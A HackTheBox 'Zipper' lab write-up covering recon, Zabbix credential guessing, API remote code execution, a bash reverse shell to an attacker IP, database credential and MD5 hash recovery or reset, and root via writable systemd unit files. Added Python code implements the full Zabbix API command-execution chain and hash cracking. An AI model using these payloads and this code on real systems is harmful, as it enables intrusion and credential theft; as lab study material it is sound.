HackTheBox - Zipper

Last updated 4 years ago

Nmap scan results (basic and all ports)

nmap -sC -sV -oA nmap-zipper zipper.htb
nmap -A -T4 -p- -oA nmap-allport zipper.htb

Directory scanning using gobuster

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://zipper.htb/ -o gobuster-dir-scan.out

After the directory scan, run an extension-based scan as well (gobuster's -x option with extensions such as php,html,bak,txt) to pick up files the plain wordlist misses.

Zabbix is open-source monitoring software for diverse IT components, including networks, servers, virtual machines and cloud services. It collects monitoring metrics such as network utilization, CPU load and disk space consumption.

Zabbix is running at /zabbix

A subdomain/vhost enumeration scan with wfuzz can run in the background while we look at the newly found /zabbix directory. Zabbix has a long list of known vulnerabilities (searchsploit zabbix in Kali).

Version identified for Zabbix: 3.0.21

Known vulnerabilities for Zabbix 3.0.x (searchsploit output)

Guessing username and creds for Zabbix

I tried zipper:zipper, then zabbix:zabbix and a bunch of other default username/password pairs. zapper:zapper produced a different error from the usual "Login name or password is incorrect" message.

That different response suggests the account exists and the password is right, even though the web frontend does not let us in. With valid credentials we can try the API JSON-RPC remote code execution exploit from searchsploit. Let's download and modify the script.

The exploit needs a username, a password and the hostid of the target host (the API's host.get method lists the hosts and their ids). Let's find the hostid.

Username: zapper, Password: zapper, HostID: 10106

Remote Code Execution with API JSON-RPC

Now let's get a reverse shell by passing the following command to the exploit:

bash -c "bash -i >& /dev/tcp/10.10.14.3/4444 0>&1"
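As an added example (not the exploit script the writeup downloads, and not Zabbix's own code), here is the JSON-RPC exchange that exploit relies on, written out in Python: user.login to obtain an auth token, host.get to find the hostid, script.create with execute_on set to the agent, script.execute against the host, and script.delete to clean up. The endpoint path /zabbix/api_jsonrpc.php, the zapper:zapper credentials and hostid 10106 are taken from the writeup; the fake frontend, its token and the host name "Zipper" are constructed so the flow can run offline.

```python
import json
import urllib.request

# Path of the Zabbix frontend API; the scheme/host come from the writeup (zipper.htb).
API_PATH = "/zabbix/api_jsonrpc.php"


class ZabbixRpc:
    """Minimal JSON-RPC 2.0 client covering the calls the public API RCE relies on."""

    def __init__(self, base_url, transport=None):
        self.url = base_url.rstrip("/") + API_PATH
        # transport(request_json) -> response_json; a fake is injected below to run offline
        self.transport = transport or self._http_post
        self.auth = None
        self._id = 0

    def _http_post(self, body):
        req = urllib.request.Request(self.url, data=body.encode(),
                                     headers={"Content-Type": "application/json-rpc"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode()

    def call(self, method, params):
        self._id += 1
        payload = {"jsonrpc": "2.0", "method": method, "params": params, "id": self._id}
        if method != "user.login":  # user.login is the only method that needs no token
            payload["auth"] = self.auth
        reply = json.loads(self.transport(json.dumps(payload)))
        if "error" in reply:  # Zabbix errors carry code/message/data
            raise RuntimeError("%s failed: %s" % (method, reply["error"].get("data")))
        return reply["result"]

    def login(self, user, password):
        # 3.0 uses "user"; recent releases renamed the parameter to "username"
        self.auth = self.call("user.login", {"user": user, "password": password})
        return self.auth

    def hostids(self):
        """Map technical host name -> hostid; this is how the exploit's hostid is found."""
        hosts = self.call("host.get", {"output": ["hostid", "host"]})
        return {h["host"]: h["hostid"] for h in hosts}

    def run_on_agent(self, hostid, command, name="maintenance check"):
        """Create a global script, run it on the host's agent, then remove it again."""
        # execute_on=0 targets the Zabbix agent on the monitored host; 1 would be the server
        created = self.call("script.create",
                            {"name": name, "command": command, "execute_on": 0, "type": 0})
        scriptid = created["scriptids"][0]
        result = self.call("script.execute", {"scriptid": scriptid, "hostid": hostid})
        self.call("script.delete", [scriptid])
        return result["value"]


def fake_frontend():
    """Constructed stand-in for the frontend so the exchange can be exercised offline.
    It accepts only zapper:zapper and knows one host with hostid 10106; the host name
    'Zipper' and the token are made up."""
    scripts = {}
    token = "3fa7c4f0e5"

    def transport(body):
        req = json.loads(body)
        method, params = req["method"], req["params"]
        if method == "user.login":
            if params == {"user": "zapper", "password": "zapper"}:
                res = {"result": token}
            else:
                res = {"error": {"code": -32602, "message": "Invalid params.",
                                 "data": "Login name or password is incorrect."}}
        elif req.get("auth") != token:
            res = {"error": {"code": -32602, "message": "Invalid params.", "data": "Not authorised."}}
        elif method == "host.get":
            res = {"result": [{"hostid": "10106", "host": "Zipper"}]}
        elif method == "script.create":
            scripts["4"] = params["command"]
            res = {"result": {"scriptids": ["4"]}}
        elif method == "script.execute":
            res = {"result": {"response": "success", "value": "ran: " + scripts[params["scriptid"]]}}
        elif method == "script.delete":
            res = {"result": {"scriptids": params}}
        else:
            res = {"error": {"code": -32601, "message": "Method not found.", "data": method}}
        res.update({"jsonrpc": "2.0", "id": req["id"]})
        return json.dumps(res)

    return transport


def demo(transport=None):
    """Full chain against the fake frontend: login -> hostid -> command on the agent."""
    rpc = ZabbixRpc("http://zipper.htb", transport=transport or fake_frontend())
    rpc.login("zapper", "zapper")
    return rpc.run_on_agent(rpc.hostids()["Zipper"], "id")


if __name__ == "__main__":
    print(demo())  # "ran: id"
```

Against a live frontend, drop the transport argument so the client POSTs to the real endpoint, and pick the hostid from hostids() instead of assuming the constructed "Zipper" name.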

Searching for MySQL passwords

Use find to locate files with "zabbix" in their name (the -name test matches filenames, not file contents):

find / -name "*zabbix*" -type f 2>/dev/null

Among the results is the Zabbix server configuration file, which holds the username and password for the Zabbix database. Note that we are inside a Docker container, so this shell is not on the actual target.

We can use these credentials to connect to the MySQL database and either recover the Admin user's password hash (Zabbix 3.0 stores frontend passwords as unsalted MD5 hashes in the users table) or overwrite it with a hash of a password we choose.

Now we can access the admin panel with our own credentials. From there we can try to execute scripts on the actual target machine rather than inside the container.
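An added example (not from the writeup) of what to do with the rows once connected to the database: Zabbix 3.0 keeps frontend passwords as unsalted MD5 in users.passwd, so a hash copied out of the table can be checked against a wordlist offline, and if that fails it can simply be replaced. "Admin" is Zabbix's default superuser alias; the sample rows, the guess list and the fallback password are constructed.

```python
import hashlib


def zabbix3_hash(password):
    """Zabbix 3.0 stores md5(password) with no salt in users.passwd (bcrypt only arrived in 5.0)."""
    return hashlib.md5(password.encode()).hexdigest()


def crack(passwd_hash, candidates):
    """Offline dictionary check of a hash copied out of the users table."""
    target = passwd_hash.strip().lower()
    for candidate in candidates:
        if zabbix3_hash(candidate) == target:
            return candidate
    return None


def reset_sql(alias, new_password):
    """UPDATE that overwrites a frontend user's hash when cracking fails.
    The alias is whitelisted before interpolation because it goes straight into SQL."""
    if not alias.isalnum():
        raise ValueError("alias must be alphanumeric")
    return "UPDATE users SET passwd='%s' WHERE alias='%s';" % (zabbix3_hash(new_password), alias)


# Constructed sample rows, as returned by `SELECT alias, passwd FROM users;`.
# Admin's hash is md5("password"); zapper's is a hash that is not in the guess list.
SAMPLE_ROWS = {
    "Admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "zapper": zabbix3_hash("not-in-the-wordlist"),
}
DEFAULT_GUESSES = ["admin", "zabbix", "password", "zapper"]


def recover_or_reset(rows=SAMPLE_ROWS, guesses=DEFAULT_GUESSES, fallback="Password1"):
    """Per user: the cracked password if the wordlist hits, otherwise the SQL that resets it."""
    out = {}
    for alias, passwd_hash in rows.items():
        found = crack(passwd_hash, guesses)
        out[alias] = found if found is not None else reset_sql(alias, fallback)
    return out
```

Cracking first is the quieter option: overwriting the hash locks the real administrator out and is visible the moment they try to log in.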

Admin Access on Zabbix (Pivoting)

We can now create a new script (Administration -> Scripts) and execute it on the target. Running it against the host fails at first with the following error, because the host's agent interface is configured as 127.0.0.1, i.e. the Zabbix container itself rather than the real target.

We can fix this by going to Configuration -> Hosts and changing the host's agent interface from 127.0.0.1 to 10.10.10.108.

Save the host, then create/edit the script with the command to execute.

Getting Reverse shell by using a malicious script

Then go to Monitoring -> Latest data and filter the results by the Zabbix servers host group to trigger the check and view its output.

And we get a reverse shell as the zabbix user, this time on the target host itself.

Privilege Escalation (Misconfigured Permissions on service/timer files)

There's a backup script that runs a 7z command with a hard-coded password. Let's grab that password and try it with su to switch to the zapper user.

There is also a binary named zabbix-service with the setuid bit set. Running strings on it gives the following output.

So the binary runs a daemon-reload and then starts the zabbix-agent service, both as root. Let's keep that in mind and proceed.

Checking the /etc/systemd/system directory for .service and .timer files:

We have read/write permissions on purge-backups.service and purge-backups.timer.

We can exploit this. The following links explain the technique in detail:

https://null-byte.wonderhowto.com/how-to/create-service-files-with-systemd-0163062/
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-service-files

Edit purge-backups.service so that its ExecStart points at /tmp/script.sh, put a reverse shell in that script and make it executable, then run the setuid zabbix-service binary. Its daemon-reload (performed as root) makes systemd re-read the modified unit, and the next time purge-backups.service is started, for example by its timer, systemd runs /tmp/script.sh as root and we get a root shell.

Note: use the binary to stop the service first, then start it again.